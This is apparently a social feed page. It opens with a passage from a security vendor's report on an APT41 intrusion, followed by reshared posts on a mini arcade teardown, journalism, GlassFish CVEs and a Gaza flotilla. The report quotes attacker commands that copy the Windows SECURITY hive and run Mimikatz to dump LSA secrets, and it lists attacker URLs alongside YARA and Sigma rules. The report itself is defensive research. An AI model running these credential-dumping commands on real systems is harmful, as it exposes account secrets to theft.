c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\security /OutputPath:c:\users\public\downloads
Mimikatz
The attackers also used Mimikatz to dump account credentials. Like the Pillager stealer, Mimikatz was rewritten and compiled into a DLL. This DLL was then loaded by the legitimate java.exe file (used for compiling Java code) via DLL sideloading. The following files were involved in launching Mimikatz:
C:\Windows\Temp\123.bat
C:\Windows\Temp\jli.dll
C:\Windows\Temp\java.exe
С:\Windows\Temp\config.ini
123.bat is a BAT script containing commands to launch the legitimate java.exe executable, which in turn loads the dynamic link library for DLL sideloading. This DLL then decrypts and executes the Mimikatz configuration file, config.ini, which is distributed from a previously compromised host within the infrastructure.
java.exe privilege::debug token::elevate lsadump::secrets exit
Retrospective threat hunting
As already mentioned, the victim organization’s monitoring coverage was initially patchy. Because of this, in the early stages, we only saw the external IP address of the initial source and couldn’t detect what was happening on that host. After some time, the host was finally connected to our monitoring systems, and we found that it was an IIS web server. Furthermore, despite the lost time, it still contained artifacts of the attack.
These included the aforementioned Cobalt Strike implant located in c:\programdata\, along with a scheduler task for establishing persistence on the system. Additionally, a web shell remained on the host, which our solutions detected as HEUR:Backdoor.MSIL.WebShell.gen. This was found in the standard temporary directory for compiled ASP.NET application files:
c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\root\dedc22b8\49ac6571\app_web_hdmuushc.dll
MD5: 0x70ECD788D47076C710BF19EA90AB000D
These temporary files are automatically generated and contain the ASPX page code:
The web shell was named newfile.aspx. The screenshot above shows its function names. Based on these names, we were able to determine that this instance utilized a Neo-reGeorg web shell tunnel.
This tool is used to proxy traffic from an external network to an internal one via an externally accessible web server. Thus, the launch of the Impacket tools, which we initially believed was originating from a host unidentified at the time (the IIS server), was in fact coming from the external network through this tunnel.
Attribution
We attribute this attack to APT41 with a high degree of confidence, based on the similarities in the TTPs, tooling, and C2 infrastructure with other APT41 campaigns. In particular:
- The attackers used a number of tools characteristic of APT41, such as Impacket, WMI, and Cobalt Strike.
- The attackers employed DLL sideloading techniques.
- During the attack, various files were saved to C:\Windows\Temp.
- The C2 domain names identified in this incident (s3-azure.com, *.ns1.s3-azure.com, *.ns2.s3-azure.com) are similar to domain names previously observed in APT41 attacks (us2[.]s3bucket-azure[.]online, status[.]s3cloud-azure[.]com).
Takeaways and lessons learned
The attackers wield a wide array of both custom-built and publicly available tools. Specifically, they use penetration testing tools like Cobalt Strike at various stages of an attack. The attackers are quick to adapt to their target’s infrastructure, updating their malicious tools to account for specific characteristics. They can even leverage internal services for C2 communication and data exfiltration. The files discovered during the investigation indicate that the malicious actor modifies its techniques during an attack to conceal its activities – for example, by rewriting executables and compiling them as DLLs for DLL sideloading.
While this story ended relatively well – we ultimately managed to evict the attackers from the target organization’s systems – it’s impossible to counter such sophisticated attacks without a comprehensive knowledge base and continuous monitoring of the entire infrastructure. For example, in the incident at hand, some assets weren’t connected to monitoring systems, which prevented us from seeing the full picture immediately. It’s also crucial to maintain maximum coverage of your infrastructure with security tools that can automatically block malicious activity in the initial stages. Finally, we strongly advise against granting excessive privileges to accounts, and especially against using such accounts on all hosts across the infrastructure.
Appendix
Rules
Yara
rule neoregeorg_aspx_web_shell
{
meta:
description = "Rule to detect neo-regeorg based ASPX web-shells"
author = "Kaspersky"
copyright = "Kaspersky"
distribution = "DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM"
strings:
$func1 = "FrameworkInitialize" fullword
$func2 = "GetTypeHashCode" fullword
$func3 = "ProcessRequest" fullword
$func4 = "__BuildControlTree"
$func5 = "__Render__control1"
$str1 = "FAIL" nocase wide
$str2 = "Port close" nocase wide
$str3 = "Port filtered" nocase wide
$str4 = "DISCONNECT" nocase wide
$str5 = "FORWARD" nocase wide
condition:
uint16(0) == 0x5A4D and
filesize < 400000 and
3 of ($func*) and
3 of ($str*)
}
Sigma
title: Service Image Path Start From CMD
id: faf1e809-0067-4c6f-9bef-2471bd6d6278
status: test
description: Detects creation of unusual service executable starting from cmd /c using command line
references:
- tbd
tags:
- attack.persistence
- attack.T1543.003
author: Kaspersky
date: 2025/05/15
logsource:
product: windows
service: security
detection:
selection:
EventID: 4697
ServiceFileName|contains:
- '%COMSPEC%'
- 'cmd'
- 'cmd.exe'
ServiceFileName|contains|all:
- '/c'
- 'start'
condition: selection
falsepositives:
- Legitimate
level: medium
IOCs
Files
2F9D2D8C4F2C50CC4D2E156B9985E7CA
9B4F0F94133650B19474AF6B5709E773
A052536E671C513221F788DE2E62316C
91D10C25497CADB7249D47AE8EC94766
C3ED337E2891736DB6334A5F1D37DC0F
9B00B6F93B70F09D8B35FA9A22B3CBA1
15097A32B515D10AD6D793D2D820F2A8
A236DCE873845BA4D3CCD8D5A4E1AEFD
740D6EB97329944D82317849F9BBD633
C7188C39B5C53ECBD3AEC77A856DDF0C
3AF014DB9BE1A04E8B312B55D4479F69
4708A2AE3A5F008C87E68ED04A081F18
125B257520D16D759B112399C3CD1466
C149252A0A3B1F5724FD76F704A1E0AF
3021C9BCA4EF3AA672461ECADC4718E6
F1025FCAD036AAD8BF124DF8C9650BBC
100B463EFF8295BA617D3AD6DF5325C6
2CD15977B72D5D74FADEDFDE2CE8934F
9D53A0336ACFB9E4DF11162CCF7383A0
27F506B198E7F5530C649B6E4860C958
Domains and IPs
47.238.184[.]9
38.175.195[.]13
hxxp://github[.]githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta
hxxp://chyedweeyaxkavyccenwjvqrsgvyj0o1y.oast[.]fun/aaa
hxxp://toun[.]callback.red/aaa
hxxp://asd.xkx3[.]callback.[]red
hxxp[:]//ap-northeast-1.s3-azure[.]com
hxxps[:]//www[.]msn-microsoft[.]org:2053
hxxp[:]//www.upload-microsoft[.]com
s3-azure.com
*.ns1.s3-azure.com
*.ns2.s3-azure.com
upload-microsoft[.]com
msn-microsoft[.]org
MITRE ATT&CK
Tactic | Technique | ID |
Initial Access | Valid Accounts: Domain Accounts | T1078.002 |
Exploit Public-Facing Application | T1190 | |
Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
Command and Scripting Interpreter: Windows Command Shell | T1059.003 | |
Scheduled Task/Job: Scheduled Task | T1053.005 | |
Windows Management Instrumentation | T1047 | |
Persistence | Create or Modify System Process: Windows Service | T1543.003 |
Hijack Execution Flow: DLL Side-Loading | T1574.002 | |
Scheduled Task/Job: Scheduled Task | T1053.005 | |
Valid Accounts: Domain Accounts | T1078.002 | |
Web Shell | T1505.003 | |
IIS Components | T1505.004 | |
Privilege Escalation | Create or Modify System Process: Windows Service | T1543.003 |
Hijack Execution Flow: DLL Side-Loading | T1574.002 | |
Process Injection | T1055 | |
Scheduled Task/Job: Scheduled Task | T1053.005 | |
Valid Accounts: Domain Accounts | T1078.002 | |
Defense Evasion | Hijack Execution Flow: DLL Side-Loading | T1574.002 |
Deobfuscate/Decode Files or Information | T1140 | |
Indicator Removal: File Deletion | T1070.004 | |
Masquerading | T1036 | |
Process Injection | T1055 | |
Credential Access | Credentials from Password Stores: Credentials from Web Browsers | T1555.003 |
OS Credential Dumping: Security Account Manager | T1003.002 | |
Unsecured Credentials | T1552 | |
Discovery | Network Service Discovery | T1046 |
Process Discovery | T1057 | |
System Information Discovery | T1082 | |
System Network Configuration Discovery | T1016 | |
Lateral movement | Lateral Tool Transfer | T1570 |
Remote Services: SMB/Windows Admin Shares | T1021.002 | |
Collection | Archive Collected Data: Archive via Utility | T1560.001 |
Automated Collection | T1119 | |
Data from Local System | T1005 | |
Command and Control | Application Layer Protocol: Web Protocols | T1071.001 |
Application Layer Protocol: DNS | T1071.004 | |
Ingress Tool Transfer | T1105 | |
Proxy: Internal Proxy | T1090.001 | |
Protocol Tunneling | T1572 | |
Exfiltration | Exfiltration Over Alternative Protocol | T1048 |
Exfiltration Over Web Service | T1567 |
Gazzetta del Cadavere reshared this.
Reverse Engineering a ‘Tony’ 6502-based Mini Arcade Machine
The mainboard of the mini arcade unit with its blob chip and EEPROM. (Credit: Poking Technology, YouTube)
For some reason, people are really into tiny arcade machines that basically require you to ruin your hands and eyes in order to play on them. That said, unlike the fifty gazillion ‘retro consoles’ that you can buy everywhere, the particular mini arcade machine that [David Given] of [Poking Technology] obtained from AliExpress for a teardown and ROM dump seems to have custom games rather than the typical gaggle of NES games and fifty ROM hack variations of each.
After a bit of gameplay to demonstrate the various games on the very tiny machine with tiny controls and a tiny 1.8″, 160×128 ST7735 LC display, the device was disassembled. Inside is a fairly decent speaker, the IO board for the controls, and the mainboard with an epoxy blob-covered chip and the SPI EEPROM containing the software. Dumping this XOR ‘encrypted’ ROM was straightforward, revealing it to be a 4 MB, W23X32-compatible EEPROM.
More after the break…
Further reverse-engineering showed the CPU to be a WDT65C02-compatible chip, running at 8 MHz with 2 kB of SRAM and 8 kB of fast ROM in addition to a 24 MHz link to the SPI EEPROM, which is used heavily during rendering. [David] created a basic SDK for those who feel like writing their own software for this mini arcade system. Considering the market that these mini arcade systems exist in, you’ve got to give the manufacturer credit for creating a somewhat original take, with hardware that is relatively easy to mod and reprogram.
Thanks to [Clint Jay] for the tip.
youtube.com/embed/jJ0XmZvR4bU?…
Short dubbing
Drama dubbing. Short drama dubbing. Drama dubbed -
Drama dubbing. Drama dubbed. Short drama dubbing. Short drama dubbed. Drama dubbing studios. Drama dubbing companyLOCUTOR TV LOCUTORES: SPANISH VOICE OVER
I giornalisti uccisi e il diritto a verità e giustizia
@Giornalismo e disordine informativo
articolo21.org/2025/07/i-giorn…
Mio figlio Andrea Rocchelli, ucciso a Sloviansk nel 2014, da un attacco con armi pesanti e leggere ad opera delle forze armate ucraine, come ha stabilito la magistratura italiana, da 11 anni a questa parte non
Giornalismo e disordine informativo reshared this.
Il Red Team Research di TIM scopre 5 CVE su Eclipse GlassFish, una critica (score 9,8)
Giovedì 16 luglio è stata una giornata significativa per i ricercatori di sicurezza informatica del team italiano Red Team Research (RTR) di TIM, che ha visto pubblicate cinque nuove vulnerabilità (CVE) da loro scoperte nel progetto Eclipse GlassFish, una delle quali è stata valutata con un punteggio di 9.8.
Il Red Team Research di TIM è gruppo di ricerca attivo dall 2019, specializzato nell’attività di bug hunting, e ha pubblicato fino ad oggi oltre 170 CVE. Il team opera nel pieno rispetto dei principi della Coordinated Vulnerability Disclosure (CVD): una pratica etica che prevede la segnalazione confidenziale delle vulnerabilità ai produttori, permettendo loro di sviluppare e rilasciare patch correttive prima della pubblicazione ufficiale.
Una volta che la patch è disponibile, con il consenso del vendor, le vulnerabilità vengono pubblicate dal Red Team Research sul National Vulnerability Database (NVD) degli Stati Uniti, o dal vendor stesso se abilitato come CNA (CVE Numbering Authority)
Eclipse GlassFish: un progetto open-source centrale per Java EE
Eclipse GlassFish è un progetto open-source utilizzato sia per lo sviluppo che per il deploy di applicazioni Java EE (oggi Jakarta EE) a livello enterprise. Originariamente sviluppato da Oracle e noto come Oracle GlassFish fino al 2017, quando Oracle ha donato il codice sorgente a Eclipse Foundation. A partire da quel momento, il progetto GlassFish è stato preso in carico da Eclipse Foundantion e ad oggi supportato con la collaborazione di realtà come Payara, Fujitsu e OmniFish.
La migrazione ha rappresentato un’enorme sfida ingegneristica e legale, con il passaggio da Oracle a Eclipse Foundation di oltre 5,5 milioni di righe di codice e oltre 61.000 file. Il codice, storicamente riservato e proprietario, è stato reso pubblico, dando la possibilità di accedervi e conoscere i test svolti. Come si legge in un comunicato stampa dell’epoca, lo sforzo di migrazione è iniziato con EclipseLink e Yasson, che erano già presso la Eclipse Foundation. I primi progetti trasferiti da Oracle GitHub sono stati JSONP, JMS, WebSocket e OpenMQ, lavoro terminato nel gennaio 2018. Il repository GlassFish e i repository CTS/TCK sono stati trasferiti nel settembre 2018.
Le vulnerabilità scoperte
Di seguito l’elenco delle CVE emesse:
CVE | CVSSv3 | Tipologia |
CVE-2024-9342 | 9.8 | CWE-307: Improper Restriction of Excessive Authentication Attempts |
CVE-2024-10029 | 6.1 | CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) |
CVE-2024-10032 | 5.4 | CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) |
CVE-2024-9343 | 6.1 | CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) |
CVE-2024-10031 | 5.4 | CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) |
Nel dettaglio, la vulnerabilità identificata e classificata con il codice CVE-2024-9342, è stata rilevata sulla versione 7.0.16 (e precedenti)del prodotto Eclipse GlassFish e valutata 9.8 Critical nella scala CVSSv3 (da 1 a 10).
In particolare, è stato possibile eseguire attacchi di Login Brute Force su due specifici URL del prodotto. Questa vulnerabilità si verifica quando il prodotto non implementa misure sufficienti per prevenire più tentativi di autenticazione falliti in un breve lasso di tempo, rendendolo più suscettibile agli attacchi brute force. La gravità di questo tipo di attacchi è che non prevede prerequisiti; pertanto, è particolarmente pericolo se l’istanza GlassFish è esposta su internet.
L’impatto rilevato dalle analisi del Red Team Research è che un attaccante può sfruttare questa vulnerabilità per ottenere accesso con privilegi amministrativi alla Administration Console o Management REST Interface del server.
Uno sguardo al laboratorio Red Team Research di TIM
Si tratta di uno tra i pochi centri italiani di ricerca sui bug di sicurezza, dove da diverso tempo vengono effettuate attività che mirano all’identificazione di vulnerabilità non documentate (0day). Le attività condotte dal team, portano ad una successiva emissione di CVE sul National Vulnerability Database (NVD) degli Stati Uniti D’America, terminato il percorso di Coordinated Vulnerability Disclosure (CVD) con il vendor del prodotto.
Nel corso di 5 anni di attività, abbiamo visto il laboratorio, emettere moltissime CVE su prodotti best-in-class e big vendor di valenza internazionale, come ad esempio Oracle, IBM, Fortinet, F5, Ericsson, Red Hat, Nokia, Computer Associates, Siemens, F5, Fortinet, QNAP, Johnson & Control, Schneider Electric, oltre ad altri fornitori su tipologie differenti di architetture software/hardware.
Nel corso del tempo, il laboratorio ha emesso 170 CVE circa, dove 14 risultano con severità Critical (>= 9.0 di score CVSSv3).
Relativamente ad una vulnerabilità rilevata dal gruppo di ricerca sul prodotto Metasys Reporting Engine (MRE) Web Services, del fornitore Johnson & Control, la Cybersecurity and Infrastructure Security Agency (CISA) degli Stati Uniti D’America, ha emesso uno specifico bollettino di sicurezza riportandolo all’attenzione dei settori: “CRITICAL INFRASTRUCTURE SECTORS, COUNTRIES/AREAS DEPLOYED e COMPANY HEADQUARTERS LOCATION”.
Si tratta di un gruppo di ricerca tutto italiano che emette CVE con costanza, contribuendo in maniera fattiva alla ricerca delle vulnerabilità non documentate a livello internazionale. Il Red TIM Research si sta distinguendo a livello Italia sull’elevata caratura delle attività svolte, oltre a contribuire all’innalzamento dei livelli di sicurezza dei prodotti utilizzati da organizzazioni internazionali.
L'articolo Il Red Team Research di TIM scopre 5 CVE su Eclipse GlassFish, una critica (score 9,8) proviene da il blog della sicurezza informatica.
FREEDOM FLOTILLA. La Handala fa rotta su Gaza
@Notizie dall'Italia e dal mondo
La nave prende il nome da "Handala", il celebre bambino dei fumetti palestinesi creato da Naji al-Ali: un rifugiato scalzo, che volta le spalle all’ingiustizia. La testimonianza video di Antonio Mazzeo
L'articolo FREEDOM pagineesteri.it/2025/07/21/med…
Notizie dall'Italia e dal mondo reshared this.
Laic Salocin
in reply to Informa Pirata • • •Informa Pirata likes this.
reshared this
Informatica (Italy e non Italy 😁) e Informa Pirata reshared this.